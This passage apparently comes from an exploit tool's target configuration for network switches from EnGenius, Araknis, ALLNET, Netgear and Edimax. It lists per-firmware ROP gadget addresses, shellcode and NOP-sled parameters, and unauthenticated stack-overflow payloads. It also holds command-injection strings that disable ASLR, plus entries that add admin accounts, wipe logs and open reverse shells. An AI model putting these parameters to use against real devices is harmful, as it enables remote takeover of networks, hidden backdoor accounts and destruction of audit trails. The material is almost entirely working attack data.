    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E15C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99851c,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x24840690,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 6,						# Should leave as-is (but you can play between 5 - 8)
    						'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    						# pt: 0 = no password, 1 = cleartext, 2 = encrypted
    														# /sqfs/home/web/cgi/set.cgi;sn_user_mngSet()
    						'address':0x42D1D4,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',			# Admin, priv 15
    						'vulnerable': True,
    					'stack_cgi_del_account': {
    														# /sqfs/home/web/cgi/set.cgi;sn_user_mngSet()
    						'address':0x42D1D4,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&na=USERNAME&pt=2&pv=0&op=0',		# 
    						'vulnerable': True,				# 
    					'stack_cgi_diag': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi;sn_tracertSet()
    						# traceroute
    						'web_sys_ping_post': 0x42CB8C,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						'sys_ping_post_cmd':'&ip= ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
    						'vulnerable': True,				# 
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
    						'log_settings_set':0x4494E8,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
    						'log_ramClear':0x44B0C0,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
    						'log_fileClear':0x44B0C0,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
    						'sys_timeSntp_set':0x42E438,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
    						'sys_timeSntpDel_set':0x42E438,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
    						'sys_timeSettings_set':0x42E438,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'security.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
    						'START':0x100271A0,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x104006A0,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 987,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 69,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			'14044-44104': {
    				'template':'EnGenius',						# Static for the vendor
    				'version':'1.07.22_c1.9.21_181018-0228',					# Version / binary dependent stuff
    				'model':'EWS1200-28TFP',				# Model
    				'verify': { 
    						'cpl_locallogin.cgi (XSS)': {
    							'description':'XSS in "redirecturl,userurl,loginurl,username,password" (PoC: Count passed XSS)',
    							'authenticated': False,
    							'vulnerable': True,
    							'safe': True
    						'sn.captivePortal.login (XSS)': {
    							'description':'XSS in "userurl & uamip" (PoC: Count passed XSS)',
    							'authenticated': False,
    							'vulnerable': True,
    							'safe': True
    						'cpl_logo_ul.cgi': {
    							'description':'Unauthenticated upload of "logo_icon". (PoC: Upload invalid file)',
    							'authenticated': False,
    							'content':'Content-Disposition: filename.png\n------',
    							'vulnerable': True,
    							'safe': True
    						'cpl_locallogin.cgi': {
    							'description':'Stack overflow in "username/password (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'username=admin&password=' + self.random_string(196),
    							'vulnerable': True,
    							'safe': True
    						'sn.captivePortal.login': {
    							'description':'Stack overflow in "called", XSS in "userurl & uamip" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),
    							'vulnerable': True,
    							'safe': True
    						'sn.jrpc.dispatch.cgi': {
    							'description':'Stack overflow in "usr, pswrd and method" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"id":1, "jsonrpc":"2.0","params":{"usr":"admin","pswrd":"' + self.random_string(288) + '"},"method":"login"}',
    							'vulnerable': True,
    							'safe': True
    						'sn.captivePortal.auth': {
    							'description':'Stack overflow in "user, chap_chal, chap_pass" (PoC: crash CGI)',
    							'authenticated': False,
    							'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E15C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99851c,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x24840690,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 6,						# Should leave as-is (but you can play between 5 - 8)
    						'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    						# pt: 0 = no password, 1 = cleartext, 2 = encrypted
    														# /sqfs/home/web/cgi/set.cgi;sn_user_mngSet()
    						'address':0x42C334,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',			# Admin, priv 15
    						'vulnerable': True,
    					'stack_cgi_del_account': {
    														# /sqfs/home/web/cgi/set.cgi;sn_user_mngSet()
    						'address':0x42C334,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&na=USERNAME&pt=2&pv=0&op=0',		# 
    						'vulnerable': True,				# 
    					'stack_cgi_diag': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi;sn_tracertSet()
    						# traceroute
    						'web_sys_ping_post': 0x42BCEC,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						'sys_ping_post_cmd':'&ip= ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
    						'vulnerable': True,				# 
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
    						'log_settings_set':0x448008,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
    						'log_ramClear':0x449BE0,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
    						'log_fileClear':0x449BE0,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
    						'sys_timeSntp_set':0x42D598,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
    						'sys_timeSntpDel_set':0x42D598,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
    						'sys_timeSettings_set':0x42D598,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'security.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
    						'START':0x100271A0,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x104006A0,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 987,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 69,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# Araknis Networks
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : Yes
    			# Del /mntlog/flash.log: Yes
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'8028-89928': {
    				'template':'Araknis',					# Static for the vendor
    				'version':'1.2.00_171225-1618',			# Version / binary dependent stuff
    				'model':'AN-310-SW-16-POE',				# Model
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E04C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99851c,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x24840470,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 6,						# Should leave as-is (but you can play between 5 - 8)
    						'safe': False, 					# Boa/Hydra restart/watchdog, False = no restart, True = restart
    						'vulnerable': True,
    					'stack_cgi_diag': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi;sn_tracertSet()
    						# traceroute
    						'web_sys_ping_post': 0x42A494,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						'sys_ping_post_cmd':'&ip= ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&session_uid=0&uid=0',
    						'vulnerable': True,				# 
    					'stack_cgi_add_account': {
    														# /sqfs/home/web/cgi/set.cgi;sn_EncrypOnly_user_mngSet()
    						'address':0x4303B4,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',			# Admin, priv 15
    						'vulnerable': True,
    					'stack_cgi_del_account': {
    														# /sqfs/home/web/cgi/set.cgi;sn_user_mngSet()
    						'address':0x42ADB8,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&na=USERNAME&pw=&pv=0&op=0',		# 
    						'vulnerable': True,				# user
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
    						'log_settings_set':0x44DBD8,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
    						'log_ramClear':0x44FC88,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
    						'log_fileClear':0x44FC88,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
    						'sys_timeSntp_set':0x42BAE4,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
    						'sys_timeSntpDel_set':0x42BAE4,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
    						'sys_timeSettings_set':0x42BAE4,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'security.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
    						# We need these to push NOP and shellcode on higher heap addresses to avoid 0x00
    						'query': (self.random_string(1) +'=' + self.random_string(1) +'&') * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
    						#'query':'a=a&' * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
    						'START':0x10010104,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP': 0x10600604,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 987,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 69,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# ALLNET GmbH Computersysteme 
    			# JSON based SG8xxx
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : Yes
    			# Del /mntlog/flash.log: Yes
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'752-76347': {
    				'template':'ALLNET_JSON',					# Static for the vendor
    				'version':'2.2.1',						# Version / binary dependent stuff
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40C4FC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f998528,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x248498dc,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_diag': {
    						'vulnerable': False,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': {
    						'vulnerable': False,
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
    						'log_settings_set':0x412ADC,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
    						'log_ramClear':0x412A24,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
    						'log_fileClear':0x412A24,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSntp_set':0x40FA74,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSntpDel_set':0x40FA74,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSettings_set':0x40FA74,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
    						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
    						'align': 3,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# ALLNET GmbH Computersysteme 
    			# Not JSON based SG8xxx
    			# (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power, Gigamedia, TG-NET)
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : No
    			# Del /mntlog/flash.log: No
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'222-50100': {
    				'template':'ALLNET',					# Static for the vendor
    				'version':'3.1.1-R3-B1',					# Version / binary dependent stuff
    				'model':'ALL-SG8310PM',				# Model
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40C74C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x2484029c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_diag': {
    						'vulnerable': False,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_setting_post()
    						'log_settings_set':0x46BB04,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_ramClear':0x46F240,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_fileClear':0x46F240,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntp_set':0x426724,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntpDel_set':0x426724,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
    						'sys_timeSettings_set':0x424D28,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    					# Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),
    					# and to fill wider area with sending '&%8f%84%01=%8f%84%80%18' where:
    					# NOP's
    					# '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00
    					# '%24%04%FF%FF' : li $a0, 0xFFFFFFFF
    					'heack_cgi_shell': {
    						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
    						'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) +'_SHELLCODE',
    						'START':0x10010104,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP' :0x10600604,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 28,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 20,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# Netgear inc.
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : No (logging do not exist)
    			# Del /var/log/flash.log : No (logging do not exist)
    			# Del /mntlog/flash.log: No (logging do not exist)
    			# Add credentials: No (Single account only)
    			# Del credentials: No (Single account only)
    			'609-31457': {
    				'template':'Netgear',						# Static for the vendor
    				'model':'GS750E ProSAFE Plus Switch',
    				'version':'',					# Version / binary dependent stuff
    				'login': {
    				'verify': { 
    						'set.cgi': {
    							'description':'Stack overflow in "password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"_ds=1&password=' + self.random_string(320) + '&err_flag=0&err_msg=&submt=&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x4102F8,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f9984fc,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x24840c6c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_diag': {
    						'vulnerable': False,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_log': {
    						'vulnerable': False,
    					# Interesting, by adding 0xc1c1c1c1 to START/STOP, remote end will decode to our original START/STOP (including 0x00) =]
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "password" (PoC: reverse shell)',
    						'authenticated': False,
    						'cgi':'set.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
    						'START':0x10001210,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x10006210,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 50,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 79,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
    						'query':'{"_ds=1&password=' + self.random_string(316) + '_RA_START&shellcode=_USRNOP_SHELLCODE&_de=1":{}}',
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    			# Netgear inc.
    			# Note: 
    			# 'username' is vulnerable for stack overflow
    			# 'pwd' use 'encode()' and not vulnerable for stack overflow (so we cannot jump with 'buffer method'...)
    			# Boa/Hydra 'getFdStr()' loop modified, original xploit dont work (0x00 are now ok), weird 'solution' to have $t9 loaded with JMP in 'fwrite()'
    			# 'hash=<MD5>' tailing all URI's
    			# CGI Reverse Shell: No
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : No
    			# Del /var/log/flash.log : No
    			# Del /mntlog/flash.log: No
    			# Add credentials: No
    			# Del credentials: No
    			'639-98866': {
    				'template':'Netgear',						# Static for the vendor
    				'model':'GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP',
    				'version':'',					# Version / binary dependent stuff
    				'hash_uri':True,	# tailed 'hash=' md5 hashed URI as csrf token
    				'login': {
    				'verify': { 
    						'set.cgi': {
    							'description':'Stack overflow in "username" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"_ds=1&username='+ self.random_string(100) +'&pwd=NOP&err_flag=0&err_msg=&submt=&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'gadget': 0x45678C,				# Direct heap address for NOP slep and shellcode
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99853c,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x2484ae5c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 6,						# Should leave as-is (but you can play between 5 - 8)
    						'safe': False
    					'stack_cgi_diag': {
    						'vulnerable': False,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    			'639-73124': {
    				'template':'Netgear',						# Static for the vendor
    				'model':'GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP',
    				'version':'',					# Version / binary dependent stuff
    				'hash_uri':True,	# tailed 'hash=' md5 hashed URI as csrf token
    				'login': {
    				'verify': { 
    						'set.cgi': {
    							'description':'Stack overflow in "username" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"_ds=1&username='+ self.random_string(100) +'&pwd=NOP&err_flag=0&err_msg=&submt=&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'gadget': 0x45778C,				# Direct heap address for NOP slep and shellcode
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f998538,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x2484afec,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 6,						# Should leave as-is (but you can play between 5 - 8)
    						'safe': False
    					'stack_cgi_diag': {
    						'vulnerable': False,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    			# EdimaxPRO
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : Yes
    			# Del /mntlog/flash.log: Yes
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'225-63242': {
    				'template':'Edimax',					# Static for the vendor
    				'version':'',					# Version / binary dependent stuff
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E6DC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f998524,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x248411bc,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_diag': {
    														# /sqfs/home/web/cgi/set.cgi;cgi_diag_traceroute_set()
    						# traceroute
    						'web_sys_ping_post':0x40DFF4,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						'sys_ping_post_cmd':'&srvHost= ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
    						'vulnerable': True,				# 
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
    						'log_settings_set':0x41D99C,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
    						'log_ramClear':0x41D8E4,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
    						'log_fileClear':0x41D8E4,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSntp_set':0x41620C,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSntpDel_set':0x41620C,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSettings_set':0x41620C,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': False,			# Not clear, may be to long URI for the stack
    					'heack_cgi_shell': {
    						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
    						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
    						'align': 3,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			'225-96283': {
    				'template':'Edimax',					# Static for the vendor
    				'version':'',					# Version / binary dependent stuff
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E6DC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f998524,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x248411ac,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,				# 
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_diag': {
    														# /sqfs/home/web/cgi/set.cgi;cgi_diag_traceroute_set()
    						# traceroute
    						'web_sys_ping_post':0x40E024,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						'sys_ping_post_cmd':'&srvHost= ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
    						'vulnerable': True,				# 
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
    						'log_settings_set':0x41D9EC,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
    						'log_ramClear':0x41D934,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
    						'log_fileClear':0x41D934,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,				# 
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSntp_set':0x416254,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
